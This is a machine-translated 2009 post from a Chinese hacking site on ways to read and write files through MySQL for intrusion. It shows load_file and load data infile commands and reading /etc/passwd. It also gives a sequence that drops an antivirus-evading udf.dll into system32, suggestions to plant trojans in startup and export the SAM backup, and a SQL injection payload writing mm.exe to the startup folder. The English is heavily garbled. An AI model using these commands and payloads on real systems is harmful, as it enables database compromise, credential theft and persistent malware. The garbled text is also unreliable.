mysql reads the file in several ways and application-vulnerability warning-the black bar safety net

ID MYHACK58:62200921836
Type myhack58
Reporter 佚名
Modified 2009-01-07T00:00:00


Today a friend asked me how to in mysql read the file, the I asked, stunned, found himself still guilty of careless: the problem is, therefore, specially checked the mysql manual. The ideas are the same, in the have the file permissions of the premise, to read the file as a string into a table, then read out the data in the table, just in a slightly different way

mysql3. x

Not sure mysql3. x can I use load_file()function I in mysql3 use manual not found, but it looks like is possible, use load data infile to read the file, the command is as follows

mysql>create table a (cmd text); mysql>load data infile 'c:\\boot.ini' into table a; mysql>select * from a;

mysql4. x

mysql4. x In addition to the load data infile, you can also use the well-known load_file() to read, the command is as follows

mysql>create table a (cmd text); mysql>insert into a (cmd) values (load_file('c:\\boot.ini')); mysql>select * from a;

mysql5. x

Under linux, mysql5. x In addition to the above two methods, can also use the system to directly execute a system command the way to read the file, is it necessary to root not sure, not tested, the command is as follows

mysql>system cat /etc/passwd

mysql reads the files in invasion are used when not more, may be used to query the configuration file to find the web path, or the webshell permissions very little time to read the other format of the webshell, and then with the into outfile is written the way Malaysia, binary files can also be so used, just hex()and unhex()step.

Example: free to killby the udf. dll files into the system directory

create table a (cmd LONGBLOB); insert into a (cmd) values (hex(load_file('c:\\windows\\temp\\udf.dll'))); SELECT unhex(cmd) FROM a INTO DUMPFILE 'c:\\windows\\system32\\udf.dll';

Other using the method are many, such as the Trojan file to write into the startup entry, or put processing through the cmd. exe file export to the system root directory, the sam backup export to a readable directory, and so on, the injection should be can also be used(in don't know the web path and can export files of the case), everyone is free to play.

Injection of the syntax, not the test

id=xxx and 1=2 union select 1,2,3,unhex(mm. exe hex),5 The INTO DUMPFILE 'C:\\Documents and Settings\\All Users\\"the beginning"菜单 \ 程序 \ 启动 \\mm.exe'/*